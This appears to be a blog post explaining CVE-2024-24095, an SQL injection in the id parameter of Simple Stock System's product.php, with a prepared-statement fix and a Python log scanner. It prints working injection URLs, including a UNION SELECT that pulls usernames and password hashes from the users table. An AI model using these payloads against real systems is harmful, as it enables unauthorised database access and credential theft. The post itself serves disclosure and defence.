In early 2024, a critical SQL Injection vulnerability was discovered in Code-Projects Simple Stock System 1., tracked as CVE-2024-24095. This post walks you through the vulnerability, shows a simple exploit, and gives references—all in plain language.

What is Code-Projects Simple Stock System?

Simple Stock System 1. is a free inventory management app offered on code-projects.org. It is often used by students and small businesses to track stock items through a simple PHP web interface.

What’s the Issue? (CVE-2024-24095)

The issue is SQL Injection—a nasty vulnerability that lets attackers interact with the database in unintended ways by injecting malicious SQL code via user input fields.

Where is the Vulnerability?

The bug is in how user input is placed directly into SQL queries without validation or parameter binding, especially in the product.php file.

A simplified snippet from the vulnerable code:

<?php
// Vulnerable code from product.php
$id = $_GET['id'];
$query = "SELECT * FROM products WHERE id = $id";  // Dangerous!
$result = mysqli_query($conn, $query);
// ...
?>

Problem:
If you control the id parameter (like in product.php?id=1), you can inject SQL commands.

Suppose the attacker visits:

http://localhost/SimpleStockSystem/product.php?id=1 OR 1=1

The SQL query becomes:

SELECT * FROM products WHERE id = 1 OR 1=1

This returns all products, ignoring the intended filter. But it gets scarier—attackers can extract sensitive data or even modify the database.

Change the URL to:

http://localhost/SimpleStockSystem/product.php?id=1 UNION SELECT 1,@@version,3,4,5

If the products table has (say) 5 columns, this query will leak the MySQL version in the result.

If you know the structure, you can steal usernames and passwords (usually MD5-hashed):

http://localhost/SimpleStockSystem/product.php?id=1 UNION SELECT 1,username,password,4,5 FROM users--

How to Fix It

Never trust user input.
Use prepared statements!

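Secure version:

<?php
// Fixed code: the SQL text is constant and the id is sent separately as a bound parameter
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
// 'i' binds the value as an integer, so it is never parsed as SQL
$stmt->bind_param('i', $id);
$stmt->execute();
$result = $stmt->get_result();
// ...
?>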

This ensures user input can’t change the structure of the SQL.
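Alongside the fix, it is worth checking whether product.php has already received non-integer id values. The following is an added example, not code from the project: it scans web server access logs for such requests. It assumes the combined log format; the function name `non_integer_ids` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges),
# not taken from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [27/Feb/2024:02:15:06 +0000] "GET /SimpleStockSystem/product.php?id=1 HTTP/1.1" 200 512
198.51.100.9 - - [27/Feb/2024:02:16:10 +0000] "GET /SimpleStockSystem/product.php?id=1%20OR%201=1 HTTP/1.1" 200 4096
198.51.100.9 - - [27/Feb/2024:02:16:44 +0000] "GET /SimpleStockSystem/product.php?id=1+UNION+SELECT+1,@@version,3,4,5 HTTP/1.1" 200 530
203.0.113.4 - - [27/Feb/2024:02:17:02 +0000] "GET /SimpleStockSystem/other.php?id=abc HTTP/1.1" 200 900
203.0.113.4 - - [27/Feb/2024:02:17:30 +0000] "GET /SimpleStockSystem/product.php HTTP/1.1" 200 300
"""

# Captures client address, request target and status from one log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
INTEGER_RE = re.compile(r"[0-9]+")


def non_integer_ids(log_text, script="product.php", param="id"):
    """Return (client, decoded value, status) for every request to `script`
    whose `param` is present but is not a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes and turns '+' into spaces, so encoded
        # values are checked in the form the PHP script receives them.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value, int(status)))
    return hits


if __name__ == "__main__":
    for client, value, status in non_integer_ids(SAMPLE_LOG):
        print(f"{client} status={status} id={value!r}")
```

A 200 response to a flagged request means the application processed the value instead of rejecting it, so those entries deserve review first.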

This bug was reported and tracked under CVE-2024-24095.

- CVE-2024-24095 at NVD
- Original project download
- OWASP SQL Injection Guide

Conclusion

CVE-2024-24095 is a classic example of why input validation and prepared statements are essential. If you use Simple Stock System 1., update your code or move to a patched version immediately.

Timeline

Published on: 02/27/2024 02:15:06 UTC
Last modified on: 11/05/2024 18:35:04 UTC